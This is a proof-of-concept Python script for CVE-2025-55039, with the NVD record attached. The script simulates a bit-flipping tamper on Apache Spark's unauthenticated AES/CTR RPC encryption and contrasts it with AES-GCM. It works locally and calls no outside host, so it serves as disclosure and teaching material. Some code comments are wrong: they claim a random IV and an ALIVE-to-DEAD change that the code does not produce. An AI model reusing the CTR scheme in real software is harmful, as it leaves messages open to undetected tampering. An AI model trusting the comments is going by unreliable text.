CVE-2025-55039

# CVE-2025-55039 PoC - AES/CTR/NoPadding Bit-Flipping Attack on Spark RPC # This PoC demonstrates the vulnerability concept of CTR mode bit-flipping # without authentication on Spark RPC traffic from Crypto.Cipher import AES from Crypto.Util import Counter import struct # Simulated Spark RPC message structure class SparkRPCMessage: def __init__(self, msg_type, payload): self.msg_type = msg_type # e.g., Heartbeat, BlockTransfer self.payload = payload # Message data def serialize(self): # Simplified serialization: type (4 bytes) + payload return struct.pack('>I', self.msg_type) + self.payload # Vulnerable encryption using AES/CTR/NoPadding (Spark's insecure default) def vulnerable_encrypt(key, plaintext): """Simulates Spark's default insecure encryption: AES/CTR/NoPadding""" # CTR mode with random IV (nonce) nonce = b'\x00' * 8 # Simplified nonce ctr = Counter.new(64, prefix=nonce, initial_value=0) cipher = AES.new(key, AES.MODE_CTR, counter=ctr) ciphertext = cipher.encrypt(plaintext) return nonce + ciphertext # Prepend nonce def vulnerable_decrypt(key, ciphertext): """Decrypts using AES/CTR/NoPadding - no integrity check!""" nonce = ciphertext[:8] encrypted = ciphertext[8:] ctr = Counter.new(64, prefix=nonce, initial_value=0) cipher = AES.new(key, AES.MODE_CTR, counter=ctr) plaintext = cipher.decrypt(encrypted) return plaintext # Secure alternative using AES/GCM/NoPadding def secure_encrypt(key, plaintext, associated_data=b''): """Recommended fix: AES/GCM/NoPadding provides authenticated encryption""" cipher = AES.new(key, AES.MODE_GCM) ciphertext, tag = cipher.encrypt_and_digest(plaintext) return cipher.nonce + ciphertext + tag def mitm_bit_flip_attack(ciphertext, flip_position, flip_value): """ Demonstrates the MITM attack: flip bits in ciphertext Since CTR mode has no authentication, modifications go undetected. """ modified = bytearray(ciphertext) modified[flip_position] ^= flip_value return bytes(modified) # Demonstration if __name__ == "__main__": key = b'0123456789abcdef' # 16-byte AES key # Create a legitimate Spark heartbeat message heartbeat = SparkRPCMessage( msg_type=1, # HEARTBEAT type payload=b"status=ALIVE;timestamp=1234567890;node=worker-01" ) plaintext = heartbeat.serialize() print("[*] Original plaintext:", plaintext) # Encrypt with vulnerable AES/CTR/NoPadding ciphertext = vulnerable_encrypt(key, plaintext) print("[*] Encrypted ciphertext (hex):", ciphertext.hex()) # Attacker intercepts and modifies ciphertext # Flip a bit in the status field area to change ALIVE to DEAD modified_ct = mitm_bit_flip_attack(ciphertext, 12, 0x01) print("[*] Modified ciphertext (hex):", modified_ct.hex()) # Victim decrypts - NO authentication failure! decrypted = vulnerable_decrypt(key, modified_ct) print("[*] Decrypted after attack:", decrypted) print("[!] Attack successful - message integrity compromised!") # Compare with secure GCM mode secure_ct = secure_encrypt(key, plaintext) print("\n[*] Secure GCM ciphertext (hex):", secure_ct.hex()) print("[*] GCM mode would detect any tampering via authentication tag")

{"cve": {"id": "CVE-2025-55039", "sourceIdentifier": "[email protected]", "published": "2025-10-15T08:15:38.460", "lastModified": "2025-11-04T22:16:30.140", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue affects Apache Spark versions before 3.4.4, 3.5.2 and 4.0.0.\n\n\n\nApache Spark versions before 4.0.0, 3.5.2 and 3.4.4 use an insecure default network encryption cipher for RPC communication between nodes.\n\nWhen spark.network.crypto.enabled is set to true (it is set to false by default), but spark.network.crypto.cipher is not explicitly configured, Spark defaults to AES in CTR mode (AES/CTR/NoPadding), which provides encryption without authentication.\n\nThis vulnerability allows a man-in-the-middle attacker to modify encrypted RPC traffic undetected by flipping bits in ciphertext, potentially compromising heartbeat messages or application data and affecting the integrity of Spark workflows.\n\n\nTo mitigate this issue, users should either configure spark.network.crypto.cipher to AES/GCM/NoPadding to enable authenticated encryption or\n\nenable SSL encryption by setting spark.ssl.enabled to true, which provides stronger transport security."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-326"}, {"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.4", "matchCriteriaId": "31BCFAC4-6096-41FE-82C7-2B1FEBBA485F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.2", "matchCriteriaId": "C08715D5-2896-4CF9-8908-4780059E738F"}]}]}], "references": [{"url": "https://lists.apache.org/thread/zrgyy9l85nm2c7vk36vr7bkyorg3w4qq", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/14/11", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}